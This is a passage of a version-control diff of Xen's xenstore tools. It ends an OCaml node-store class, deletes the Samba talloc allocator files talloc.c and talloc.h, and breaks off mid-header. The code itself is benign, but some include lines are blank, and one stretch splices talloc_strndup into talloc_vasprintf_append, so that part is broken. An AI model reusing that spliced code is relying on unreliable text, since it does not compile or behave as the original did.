path))#remove_child path + method replace_node (node : 'contents node) = + let node_to_replace = + if node#path = root_path + then self#root + else ( + if self#node_exists node#path then self#remove_node node#path; + self#construct_node node#path + ) in + node_to_replace#set_contents node#contents + method write_node path (contents : 'contents) = + let node = self#get_node path in + match node#contents with + | Empty | Value _ -> node#set_contents (Value contents) + | Children children | Hack (_, children) -> node#set_contents (Hack (contents, children)) +end diff -r 10a8fae412c5 tools/xenstore/talloc.c --- a/tools/xenstore/talloc.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,1311 +0,0 @@ -/* - Samba Unix SMB/CIFS implementation. - - Samba trivial allocation library - new interface - - NOTE: Please read talloc_guide.txt for full documentation - - Copyright (C) Andrew Tridgell 2004 - - ** NOTE! The following LGPL license applies to the talloc - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -/* - inspired by http://swapped.cc/halloc/ -*/ - -#ifdef _SAMBA_BUILD_ -#include "includes.h" -#if ((SAMBA_VERSION_MAJOR==3)&&(SAMBA_VERSION_MINOR<9)) -/* This is to circumvent SAMBA3's paranoid malloc checker. Here in this file - * we trust ourselves... */ -#ifdef malloc -#undef malloc -#endif -#ifdef realloc -#undef realloc -#endif -#endif -#else -#include -#include -#include -#include -#include -#include "talloc.h" -/* assume a modern system */ -#define HAVE_VA_COPY -#endif - -/* use this to force every realloc to change the pointer, to stress test - code that might not cope */ -#define ALWAYS_REALLOC 0 - - -#define MAX_TALLOC_SIZE 0x10000000 -#define TALLOC_MAGIC 0xe814ec70 -#define TALLOC_FLAG_FREE 0x01 -#define TALLOC_FLAG_LOOP 0x02 -#define TALLOC_MAGIC_REFERENCE ((const char *)1) - -/* by default we abort when given a bad pointer (such as when talloc_free() is called - on a pointer that came from malloc() */ -#ifndef TALLOC_ABORT -#define TALLOC_ABORT(reason) abort() -#endif - -#ifndef discard_const_p -#if defined(__intptr_t_defined) || defined(HAVE_INTPTR_T) -# define discard_const_p(type, ptr) ((type *)((intptr_t)(ptr))) -#else -# define discard_const_p(type, ptr) ((type *)(ptr)) -#endif -#endif - -/* this null_context is only used if talloc_enable_leak_report() or - talloc_enable_leak_report_full() is called, otherwise it remains - NULL -*/ -static const void *null_context; -static void *cleanup_context; - - -struct talloc_reference_handle { - struct talloc_reference_handle *next, *prev; - void *ptr; -}; - -typedef int (*talloc_destructor_t)(void *); - -struct talloc_chunk { - struct talloc_chunk *next, *prev; - struct talloc_chunk *parent, *child; - struct talloc_reference_handle *refs; - unsigned int null_refs; /* references from null_context */ - talloc_destructor_t destructor; - const char *name; - size_t size; - unsigned flags; -}; - -/* 16 byte alignment seems to keep everyone happy */ -#define TC_HDR_SIZE ((sizeof(struct talloc_chunk)+15)&~15) -#define TC_PTR_FROM_CHUNK(tc) ((void *)(TC_HDR_SIZE + (char*)tc)) - -/* panic if we get a bad magic value */ -static struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr) -{ - const char *pp = ptr; - struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE); - if ((tc->flags & ~0xF) != TALLOC_MAGIC) { - TALLOC_ABORT("Bad talloc magic value - unknown value"); - } - if (tc->flags & TALLOC_FLAG_FREE) { - TALLOC_ABORT("Bad talloc magic value - double free"); - } - return tc; -} - -/* hook into the front of the list */ -#define _TLIST_ADD(list, p) \ -do { \ - if (!(list)) { \ - (list) = (p); \ - (p)->next = (p)->prev = NULL; \ - } else { \ - (list)->prev = (p); \ - (p)->next = (list); \ - (p)->prev = NULL; \ - (list) = (p); \ - }\ -} while (0) - -/* remove an element from a list - element doesn't have to be in list. */ -#define _TLIST_REMOVE(list, p) \ -do { \ - if ((p) == (list)) { \ - (list) = (p)->next; \ - if (list) (list)->prev = NULL; \ - } else { \ - if ((p)->prev) (p)->prev->next = (p)->next; \ - if ((p)->next) (p)->next->prev = (p)->prev; \ - } \ - if ((p) && ((p) != (list))) (p)->next = (p)->prev = NULL; \ -} while (0) - - -/* - return the parent chunk of a pointer -*/ -static struct talloc_chunk *talloc_parent_chunk(const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - while (tc->prev) tc=tc->prev; - return tc->parent; -} - -void *talloc_parent(const void *ptr) -{ - struct talloc_chunk *tc = talloc_parent_chunk(ptr); - return tc? TC_PTR_FROM_CHUNK(tc) : NULL; -} - -/* - Allocate a bit of memory as a child of an existing pointer -*/ -void *_talloc(const void *context, size_t size) -{ - struct talloc_chunk *tc; - - if (context == NULL) { - context = null_context; - } - - if (size >= MAX_TALLOC_SIZE) { - return NULL; - } - - tc = malloc(TC_HDR_SIZE+size); - if (tc == NULL) return NULL; - - tc->size = size; - tc->flags = TALLOC_MAGIC; - tc->destructor = NULL; - tc->child = NULL; - tc->name = NULL; - tc->refs = NULL; - tc->null_refs = 0; - - if (context) { - struct talloc_chunk *parent = talloc_chunk_from_ptr(context); - - tc->parent = parent; - - if (parent->child) { - parent->child->parent = NULL; - } - - _TLIST_ADD(parent->child, tc); - } else { - tc->next = tc->prev = tc->parent = NULL; - } - - return TC_PTR_FROM_CHUNK(tc); -} - - -/* - setup a destructor to be called on free of a pointer - the destructor should return 0 on success, or -1 on failure. - if the destructor fails then the free is failed, and the memory can - be continued to be used -*/ -void talloc_set_destructor(const void *ptr, int (*destructor)(void *)) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - tc->destructor = destructor; -} - -/* - increase the reference count on a piece of memory. -*/ -void talloc_increase_ref_count(const void *ptr) -{ - struct talloc_chunk *tc; - if (ptr == NULL) return; - - tc = talloc_chunk_from_ptr(ptr); - tc->null_refs++; -} - -/* - helper for talloc_reference() -*/ -static int talloc_reference_destructor(void *ptr) -{ - struct talloc_reference_handle *handle = ptr; - struct talloc_chunk *tc1 = talloc_chunk_from_ptr(ptr); - struct talloc_chunk *tc2 = talloc_chunk_from_ptr(handle->ptr); - if (tc1->destructor != (talloc_destructor_t)-1) { - tc1->destructor = NULL; - } - _TLIST_REMOVE(tc2->refs, handle); - talloc_free(handle); - return 0; -} - -/* - make a secondary reference to a pointer, hanging off the given context. - the pointer remains valid until both the original caller and this given - context are freed. - - the major use for this is when two different structures need to reference the - same underlying data, and you want to be able to free the two instances separately, - and in either order -*/ -void *talloc_reference(const void *context, const void *ptr) -{ - struct talloc_chunk *tc; - struct talloc_reference_handle *handle; - if (ptr == NULL) return NULL; - - tc = talloc_chunk_from_ptr(ptr); - handle = talloc_named_const(context, sizeof(*handle), TALLOC_MAGIC_REFERENCE); - - if (handle == NULL) return NULL; - - /* note that we hang the destructor off the handle, not the - main context as that allows the caller to still setup their - own destructor on the context if they want to */ - talloc_set_destructor(handle, talloc_reference_destructor); - handle->ptr = discard_const_p(void, ptr); - _TLIST_ADD(tc->refs, handle); - return handle->ptr; -} - -/* - remove a secondary reference to a pointer. This undo's what - talloc_reference() has done. The context and pointer arguments - must match those given to a talloc_reference() -*/ -static int talloc_unreference(const void *context, const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - struct talloc_reference_handle *h; - - if (context == NULL) { - context = null_context; - } - - if ((context == null_context) && tc->null_refs) { - tc->null_refs--; - return 0; - } - - for (h=tc->refs;h;h=h->next) { - struct talloc_chunk *p = talloc_parent_chunk(h); - if (p == NULL) { - if (context == NULL) break; - } else if (TC_PTR_FROM_CHUNK(p) == context) { - break; - } - } - if (h == NULL) { - return -1; - } - - talloc_set_destructor(h, NULL); - _TLIST_REMOVE(tc->refs, h); - talloc_free(h); - return 0; -} - -/* - remove a specific parent context from a pointer. This is a more - controlled varient of talloc_free() -*/ -int talloc_unlink(const void *context, void *ptr) -{ - struct talloc_chunk *tc_p, *new_p; - void *new_parent; - - if (ptr == NULL) { - return -1; - } - - if (context == NULL) { - context = null_context; - } - - if (talloc_unreference(context, ptr) == 0) { - return 0; - } - - if (context == NULL) { - if (talloc_parent_chunk(ptr) != NULL) { - return -1; - } - } else { - if (talloc_chunk_from_ptr(context) != talloc_parent_chunk(ptr)) { - return -1; - } - } - - tc_p = talloc_chunk_from_ptr(ptr); - - if (tc_p->refs == NULL) { - return talloc_free(ptr); - } - - new_p = talloc_parent_chunk(tc_p->refs); - if (new_p) { - new_parent = TC_PTR_FROM_CHUNK(new_p); - } else { - new_parent = NULL; - } - - if (talloc_unreference(new_parent, ptr) != 0) { - return -1; - } - - talloc_steal(new_parent, ptr); - - return 0; -} - -/* - add a name to an existing pointer - va_list version -*/ -static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap) PRINTF_ATTRIBUTE(2,0); - -static void talloc_set_name_v(const void *ptr, const char *fmt, va_list ap) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - tc->name = talloc_vasprintf(ptr, fmt, ap); - if (tc->name) { - talloc_set_name_const(tc->name, ".name"); - } -} - -/* - add a name to an existing pointer -*/ -void talloc_set_name(const void *ptr, const char *fmt, ...) -{ - va_list ap; - va_start(ap, fmt); - talloc_set_name_v(ptr, fmt, ap); - va_end(ap); -} - -/* - more efficient way to add a name to a pointer - the name must point to a - true string constant -*/ -void talloc_set_name_const(const void *ptr, const char *name) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - tc->name = name; -} - -/* - create a named talloc pointer. Any talloc pointer can be named, and - talloc_named() operates just like talloc() except that it allows you - to name the pointer. -*/ -void *talloc_named(const void *context, size_t size, const char *fmt, ...) -{ - va_list ap; - void *ptr; - - ptr = _talloc(context, size); - if (ptr == NULL) return NULL; - - va_start(ap, fmt); - talloc_set_name_v(ptr, fmt, ap); - va_end(ap); - - return ptr; -} - -/* - create a named talloc pointer. Any talloc pointer can be named, and - talloc_named() operates just like talloc() except that it allows you - to name the pointer. -*/ -void *talloc_named_const(const void *context, size_t size, const char *name) -{ - void *ptr; - - ptr = _talloc(context, size); - if (ptr == NULL) { - return NULL; - } - - talloc_set_name_const(ptr, name); - - return ptr; -} - -/* - return the name of a talloc ptr, or "UNNAMED" -*/ -const char *talloc_get_name(const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - if (tc->name == TALLOC_MAGIC_REFERENCE) { - return ".reference"; - } - if (tc->name) { - return tc->name; - } - return "UNNAMED"; -} - - -/* - check if a pointer has the given name. If it does, return the pointer, - otherwise return NULL -*/ -void *talloc_check_name(const void *ptr, const char *name) -{ - const char *pname; - if (ptr == NULL) return NULL; - pname = talloc_get_name(ptr); - if (pname == name || strcmp(pname, name) == 0) { - return discard_const_p(void, ptr); - } - return NULL; -} - - -/* - this is for compatibility with older versions of talloc -*/ -void *talloc_init(const char *fmt, ...) -{ - va_list ap; - void *ptr; - - talloc_enable_null_tracking(); - - ptr = _talloc(NULL, 0); - if (ptr == NULL) return NULL; - - va_start(ap, fmt); - talloc_set_name_v(ptr, fmt, ap); - va_end(ap); - - return ptr; -} - -/* - this is a replacement for the Samba3 talloc_destroy_pool functionality. It - should probably not be used in new code. It's in here to keep the talloc - code consistent across Samba 3 and 4. -*/ -static void talloc_free_children(void *ptr) -{ - struct talloc_chunk *tc; - - if (ptr == NULL) { - return; - } - - tc = talloc_chunk_from_ptr(ptr); - - while (tc->child) { - /* we need to work out who will own an abandoned child - if it cannot be freed. In priority order, the first - choice is owner of any remaining reference to this - pointer, the second choice is our parent, and the - final choice is the null context. */ - void *child = TC_PTR_FROM_CHUNK(tc->child); - const void *new_parent = null_context; - if (tc->child->refs) { - struct talloc_chunk *p = talloc_parent_chunk(tc->child->refs); - if (p) new_parent = TC_PTR_FROM_CHUNK(p); - } - if (talloc_free(child) == -1) { - if (new_parent == null_context) { - struct talloc_chunk *p = talloc_parent_chunk(ptr); - if (p) new_parent = TC_PTR_FROM_CHUNK(p); - } - talloc_steal(new_parent, child); - } - } -} - -/* - free a talloc pointer. This also frees all child pointers of this - pointer recursively - - return 0 if the memory is actually freed, otherwise -1. The memory - will not be freed if the ref_count is > 1 or the destructor (if - any) returns non-zero -*/ -int talloc_free(void *ptr) -{ - struct talloc_chunk *tc; - - if (ptr == NULL) { - return -1; - } - - tc = talloc_chunk_from_ptr(ptr); - - if (tc->null_refs) { - tc->null_refs--; - return -1; - } - - if (tc->refs) { - talloc_reference_destructor(tc->refs); - return -1; - } - - if (tc->flags & TALLOC_FLAG_LOOP) { - /* we have a free loop - stop looping */ - return 0; - } - - if (tc->destructor) { - talloc_destructor_t d = tc->destructor; - if (d == (talloc_destructor_t)-1) { - return -1; - } - tc->destructor = (talloc_destructor_t)-1; - if (d(ptr) == -1) { - tc->destructor = d; - return -1; - } - tc->destructor = NULL; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - talloc_free_children(ptr); - - if (tc->parent) { - _TLIST_REMOVE(tc->parent->child, tc); - if (tc->parent->child) { - tc->parent->child->parent = tc->parent; - } - } else { - if (tc->prev) tc->prev->next = tc->next; - if (tc->next) tc->next->prev = tc->prev; - } - - tc->flags |= TALLOC_FLAG_FREE; - - free(tc); - return 0; -} - - - -/* - A talloc version of realloc. The context argument is only used if - ptr is NULL -*/ -void *_talloc_realloc(const void *context, void *ptr, size_t size, const char *name) -{ - struct talloc_chunk *tc; - void *new_ptr; - - /* size zero is equivalent to free() */ - if (size == 0) { - talloc_free(ptr); - return NULL; - } - - if (size >= MAX_TALLOC_SIZE) { - return NULL; - } - - /* realloc(NULL) is equavalent to malloc() */ - if (ptr == NULL) { - return talloc_named_const(context, size, name); - } - - tc = talloc_chunk_from_ptr(ptr); - - /* don't allow realloc on referenced pointers */ - if (tc->refs) { - return NULL; - } - - /* by resetting magic we catch users of the old memory */ - tc->flags |= TALLOC_FLAG_FREE; - -#if ALWAYS_REALLOC - new_ptr = malloc(size + TC_HDR_SIZE); - if (new_ptr) { - memcpy(new_ptr, tc, tc->size + TC_HDR_SIZE); - free(tc); - } -#else - new_ptr = realloc(tc, size + TC_HDR_SIZE); -#endif - if (!new_ptr) { - tc->flags &= ~TALLOC_FLAG_FREE; - return NULL; - } - - tc = new_ptr; - tc->flags &= ~TALLOC_FLAG_FREE; - if (tc->parent) { - tc->parent->child = new_ptr; - } - if (tc->child) { - tc->child->parent = new_ptr; - } - - if (tc->prev) { - tc->prev->next = tc; - } - if (tc->next) { - tc->next->prev = tc; - } - - tc->size = size; - talloc_set_name_const(TC_PTR_FROM_CHUNK(tc), name); - - return TC_PTR_FROM_CHUNK(tc); -} - -/* - move a lump of memory from one talloc context to another return the - ptr on success, or NULL if it could not be transferred. - passing NULL as ptr will always return NULL with no side effects. -*/ -void *talloc_steal(const void *new_ctx, const void *ptr) -{ - struct talloc_chunk *tc, *new_tc; - - if (!ptr) { - return NULL; - } - - if (new_ctx == NULL) { - new_ctx = null_context; - } - - tc = talloc_chunk_from_ptr(ptr); - - if (new_ctx == NULL) { - if (tc->parent) { - _TLIST_REMOVE(tc->parent->child, tc); - if (tc->parent->child) { - tc->parent->child->parent = tc->parent; - } - } else { - if (tc->prev) tc->prev->next = tc->next; - if (tc->next) tc->next->prev = tc->prev; - } - - tc->parent = tc->next = tc->prev = NULL; - return discard_const_p(void, ptr); - } - - new_tc = talloc_chunk_from_ptr(new_ctx); - - if (tc == new_tc) { - return discard_const_p(void, ptr); - } - - if (tc->parent) { - _TLIST_REMOVE(tc->parent->child, tc); - if (tc->parent->child) { - tc->parent->child->parent = tc->parent; - } - } else { - if (tc->prev) tc->prev->next = tc->next; - if (tc->next) tc->next->prev = tc->prev; - } - - tc->parent = new_tc; - if (new_tc->child) new_tc->child->parent = NULL; - _TLIST_ADD(new_tc->child, tc); - - return discard_const_p(void, ptr); -} - -/* - return the total size of a talloc pool (subtree) -*/ -off_t talloc_total_size(const void *ptr) -{ - off_t total = 0; - struct talloc_chunk *c, *tc; - - if (ptr == NULL) { - ptr = null_context; - } - if (ptr == NULL) { - return 0; - } - - tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return 0; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - total = tc->size; - for (c=tc->child;c;c=c->next) { - total += talloc_total_size(TC_PTR_FROM_CHUNK(c)); - } - - tc->flags &= ~TALLOC_FLAG_LOOP; - - return total; -} - -/* - return the total number of blocks in a talloc pool (subtree) -*/ -off_t talloc_total_blocks(const void *ptr) -{ - off_t total = 0; - struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return 0; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - total++; - for (c=tc->child;c;c=c->next) { - total += talloc_total_blocks(TC_PTR_FROM_CHUNK(c)); - } - - tc->flags &= ~TALLOC_FLAG_LOOP; - - return total; -} - -/* - return the number of external references to a pointer -*/ -static int talloc_reference_count(const void *ptr) -{ - struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr); - struct talloc_reference_handle *h; - int ret = 0; - - for (h=tc->refs;h;h=h->next) { - ret++; - } - return ret; -} - -/* - report on memory usage by all children of a pointer, giving a full tree view -*/ -void talloc_report_depth(const void *ptr, FILE *f, int depth) -{ - struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - for (c=tc->child;c;c=c->next) { - if (c->name == TALLOC_MAGIC_REFERENCE) { - struct talloc_reference_handle *handle = TC_PTR_FROM_CHUNK(c); - const char *name2 = talloc_get_name(handle->ptr); - fprintf(f, "%*sreference to: %s\n", depth*4, "", name2); - } else { - const char *name = talloc_get_name(TC_PTR_FROM_CHUNK(c)); - fprintf(f, "%*s%-30s contains %6lu bytes in %3lu blocks (ref %d)\n", - depth*4, "", - name, - (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)), - talloc_reference_count(TC_PTR_FROM_CHUNK(c))); - talloc_report_depth(TC_PTR_FROM_CHUNK(c), f, depth+1); - } - } - tc->flags &= ~TALLOC_FLAG_LOOP; -} - -/* - report on memory usage by all children of a pointer, giving a full tree view -*/ -void talloc_report_full(const void *ptr, FILE *f) -{ - if (ptr == NULL) { - ptr = null_context; - } - if (ptr == NULL) return; - - fprintf(f,"full talloc report on '%s' (total %lu bytes in %lu blocks)\n", - talloc_get_name(ptr), - (unsigned long)talloc_total_size(ptr), - (unsigned long)talloc_total_blocks(ptr)); - - talloc_report_depth(ptr, f, 1); - fflush(f); -} - -/* - report on memory usage by all children of a pointer -*/ -void talloc_report(const void *ptr, FILE *f) -{ - struct talloc_chunk *c, *tc; - - if (ptr == NULL) { - ptr = null_context; - } - if (ptr == NULL) return; - - fprintf(f,"talloc report on '%s' (total %lu bytes in %lu blocks)\n", - talloc_get_name(ptr), - (unsigned long)talloc_total_size(ptr), - (unsigned long)talloc_total_blocks(ptr)); - - tc = talloc_chunk_from_ptr(ptr); - - for (c=tc->child;c;c=c->next) { - fprintf(f, "\t%-30s contains %6lu bytes in %3lu blocks\n", - talloc_get_name(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c))); - } - fflush(f); -} - -/* - report on any memory hanging off the null context -*/ -static void talloc_report_null(void) -{ - if (talloc_total_size(null_context) != 0) { - talloc_report(null_context, stderr); - } -} - -/* - report on any memory hanging off the null context -*/ -static void talloc_report_null_full(void) -{ - if (talloc_total_size(null_context) != 0) { - talloc_report_full(null_context, stderr); - } -} - -/* - enable tracking of the NULL context -*/ -void talloc_enable_null_tracking(void) -{ - if (null_context == NULL) { - null_context = talloc_named_const(NULL, 0, "null_context"); - } -} - -#ifdef _SAMBA_BUILD_ -/* Ugly calls to Samba-specific sprintf_append... JRA. */ - -/* - report on memory usage by all children of a pointer, giving a full tree view -*/ -static void talloc_report_depth_str(const void *ptr, char **pps, ssize_t *plen, size_t *pbuflen, int depth) -{ - struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr); - - if (tc->flags & TALLOC_FLAG_LOOP) { - return; - } - - tc->flags |= TALLOC_FLAG_LOOP; - - for (c=tc->child;c;c=c->next) { - if (c->name == TALLOC_MAGIC_REFERENCE) { - struct talloc_reference_handle *handle = TC_PTR_FROM_CHUNK(c); - const char *name2 = talloc_get_name(handle->ptr); - - sprintf_append(NULL, pps, plen, pbuflen, - "%*sreference to: %s\n", depth*4, "", name2); - - } else { - const char *name = talloc_get_name(TC_PTR_FROM_CHUNK(c)); - - sprintf_append(NULL, pps, plen, pbuflen, - "%*s%-30s contains %6lu bytes in %3lu blocks (ref %d)\n", - depth*4, "", - name, - (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)), - (unsigned long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)), - talloc_reference_count(TC_PTR_FROM_CHUNK(c))); - - talloc_report_depth_str(TC_PTR_FROM_CHUNK(c), pps, plen, pbuflen, depth+1); - } - } - tc->flags &= ~TALLOC_FLAG_LOOP; -} - -/* - report on memory usage by all children of a pointer -*/ -char *talloc_describe_all(void) -{ - ssize_t len = 0; - size_t buflen = 512; - char *s = NULL; - - if (null_context == NULL) { - return NULL; - } - - sprintf_append(NULL, &s, &len, &buflen, - "full talloc report on '%s' (total %lu bytes in %lu blocks)\n", - talloc_get_name(null_context), - (unsigned long)talloc_total_size(null_context), - (unsigned long)talloc_total_blocks(null_context)); - - if (!s) { - return NULL; - } - talloc_report_depth_str(null_context, &s, &len, &buflen, 1); - return s; -} -#endif - -/* - enable leak reporting on exit -*/ -void talloc_enable_leak_report(void) -{ - talloc_enable_null_tracking(); - atexit(talloc_report_null); -} - -/* - enable full leak reporting on exit -*/ -void talloc_enable_leak_report_full(void) -{ - talloc_enable_null_tracking(); - atexit(talloc_report_null_full); -} - -/* - talloc and zero memory. -*/ -void *_talloc_zero(const void *ctx, size_t size, const char *name) -{ - void *p = talloc_named_const(ctx, size, name); - - if (p) { - memset(p, '\0', size); - } - - return p; -} - - -/* - memdup with a talloc. -*/ -void *_talloc_memdup(const void *t, const void *p, size_t size, const char *name) -{ - void *newp = talloc_named_const(t, size, name); - - if (newp) { - memcpy(newp, p, size); - } - - return newp; -} - -/* - strdup with a talloc -*/ -char *talloc_strdup(const void *t, const char *p) -{ - char *ret; - if (!p) { - return NULL; - } - ret = talloc_memdup(t, p, strlen(p) + 1); - if (ret) { - talloc_set_name_const(ret, ret); - } - return ret; -} - -/* - append to a talloced string -*/ -char *talloc_append_string(const void *t, char *orig, const char *append) -{ - char *ret; - size_t olen = strlen(orig); - size_t alenz; - - if (!append) - return orig; - - alenz = strlen(append) + 1; - - ret = talloc_realloc(t, orig, char, olen + alenz); - if (!ret) - return NULL; - - /* append the string with the trailing \0 */ - memcpy(&ret[olen], append, alenz); - - return ret; -} - -/* - strndup with a talloc -*/ -char *talloc_strndup(const void *t, const char *p, size_t n) -{ - size_t len; - char *ret; - - for (len=0; lensize - 1; - if ((len = vsnprintf(NULL, 0, fmt, ap2)) <= 0) { - /* Either the vsnprintf failed or the format resulted in - * no characters being formatted. In the former case, we - * ought to return NULL, in the latter we ought to return - * the original string. Most current callers of this - * function expect it to never return NULL. - */ - return s; - } - - s = talloc_realloc(NULL, s, char, s_len + len+1); - if (!s) return NULL; - - VA_COPY(ap2, ap); - - vsnprintf(s+s_len, len+1, fmt, ap2); - talloc_set_name_const(s, s); - - return s; -} - -/* - Realloc @p s to append the formatted result of @p fmt and return @p - s, which may have moved. Good for gradually accumulating output - into a string buffer. - */ -char *talloc_asprintf_append(char *s, const char *fmt, ...) -{ - va_list ap; - - va_start(ap, fmt); - s = talloc_vasprintf_append(s, fmt, ap); - va_end(ap); - return s; -} - -/* - alloc an array, checking for integer overflow in the array size -*/ -void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const char *name) -{ - if (count >= MAX_TALLOC_SIZE/el_size) { - return NULL; - } - return talloc_named_const(ctx, el_size * count, name); -} - -/* - alloc an zero array, checking for integer overflow in the array size -*/ -void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, const char *name) -{ - if (count >= MAX_TALLOC_SIZE/el_size) { - return NULL; - } - return _talloc_zero(ctx, el_size * count, name); -} - - -/* - realloc an array, checking for integer overflow in the array size -*/ -void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, unsigned count, const char *name) -{ - if (count >= MAX_TALLOC_SIZE/el_size) { - return NULL; - } - return _talloc_realloc(ctx, ptr, el_size * count, name); -} - -/* - a function version of talloc_realloc(), so it can be passed as a function pointer - to libraries that want a realloc function (a realloc function encapsulates - all the basic capabilities of an allocation library, which is why this is useful) -*/ -void *talloc_realloc_fn(const void *context, void *ptr, size_t size) -{ - return _talloc_realloc(context, ptr, size, NULL); -} - - -static void talloc_autofree(void) -{ - talloc_free(cleanup_context); - cleanup_context = NULL; -} - -/* - return a context which will be auto-freed on exit - this is useful for reducing the noise in leak reports -*/ -void *talloc_autofree_context(void) -{ - if (cleanup_context == NULL) { - cleanup_context = talloc_named_const(NULL, 0, "autofree_context"); - atexit(talloc_autofree); - } - return cleanup_context; -} - -size_t talloc_get_size(const void *context) -{ - struct talloc_chunk *tc; - - if (context == NULL) - return 0; - - tc = talloc_chunk_from_ptr(context); - - return tc->size; -} - -/* - find a parent of this context that has the given name, if any -*/ -void *talloc_find_parent_byname(const void *context, const char *name) -{ - struct talloc_chunk *tc; - - if (context == NULL) { - return NULL; - } - - tc = talloc_chunk_from_ptr(context); - while (tc) { - if (tc->name && strcmp(tc->name, name) == 0) { - return TC_PTR_FROM_CHUNK(tc); - } - while (tc && tc->prev) tc = tc->prev; - tc = tc->parent; - } - return NULL; -} - -/* - show the parentage of a context -*/ -void talloc_show_parents(const void *context, FILE *file) -{ - struct talloc_chunk *tc; - - if (context == NULL) { - fprintf(file, "talloc no parents for NULL\n"); - return; - } - - tc = talloc_chunk_from_ptr(context); - fprintf(file, "talloc parents of '%s'\n", talloc_get_name(context)); - while (tc) { - fprintf(file, "\t'%s'\n", talloc_get_name(TC_PTR_FROM_CHUNK(tc))); - while (tc && tc->prev) tc = tc->prev; - tc = tc->parent; - } -} diff -r 10a8fae412c5 tools/xenstore/talloc.h --- a/tools/xenstore/talloc.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,144 +0,0 @@ -#ifndef _TALLOC_H_ -#define _TALLOC_H_ -/* - Unix SMB/CIFS implementation. - Samba temporary memory allocation functions - - Copyright (C) Andrew Tridgell 2004-2005 - - ** NOTE! The following LGPL license applies to the talloc - ** library. This does NOT imply that all of Samba is released - ** under the LGPL - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -/* this is only needed for compatibility with the old talloc */ -typedef void TALLOC_CTX; - -/* - this uses a little trick to allow __LINE__ to be stringified -*/ -#define _STRING_LINE_(s) #s -#define _STRING_LINE2_(s) _STRING_LINE_(s) -#define __LINESTR__ _STRING_LINE2_(__LINE__) -#define __location__ __FILE__ ":" __LINESTR__ - -#ifndef TALLOC_DEPRECATED -#define TALLOC_DEPRECATED 0 -#endif - -/* useful macros for creating type checked pointers */ -#define talloc(ctx, type) (type *)talloc_named_const(ctx, sizeof(type), #type) -#define talloc_size(ctx, size) talloc_named_const(ctx, size, __location__) - -#define talloc_new(ctx) talloc_named_const(ctx, 0, "talloc_new: " __location__) - -#define talloc_zero(ctx, type) (type *)_talloc_zero(ctx, sizeof(type), #type) -#define talloc_zero_size(ctx, size) _talloc_zero(ctx, size, __location__) - -#define talloc_zero_array(ctx, type, count) (type *)_talloc_zero_array(ctx, sizeof(type), count, #type) -#define talloc_array(ctx, type, count) (type *)_talloc_array(ctx, sizeof(type), count, #type) -#define talloc_array_size(ctx, size, count) _talloc_array(ctx, size, count, __location__) - -#define talloc_realloc(ctx, p, type, count) (type *)_talloc_realloc_array(ctx, p, sizeof(type), count, #type) -#define talloc_realloc_size(ctx, ptr, size) _talloc_realloc(ctx, ptr, size, __location__) - -#define talloc_memdup(t, p, size) _talloc_memdup(t, p, size, __location__) - -#define malloc_p(type) (type *)malloc(sizeof(type)) -#define malloc_array_p(type, count) (type *)realloc_array(NULL, sizeof(type), count) -#define realloc_p(p, type, count) (type *)realloc_array(p, sizeof(type), count) - -#if 0 -/* Not correct for Samba3. */ -#define data_blob(ptr, size) data_blob_named(ptr, size, "DATA_BLOB: "__location__) -#define data_blob_talloc(ctx, ptr, size) data_blob_talloc_named(ctx, ptr, size, "DATA_BLOB: "__location__) -#define data_blob_dup_talloc(ctx, blob) data_blob_talloc_named(ctx, (blob)->data, (blob)->length, "DATA_BLOB: "__location__) -#endif - -#define talloc_set_type(ptr, type) talloc_set_name_const(ptr, #type) -#define talloc_get_type(ptr, type) (type 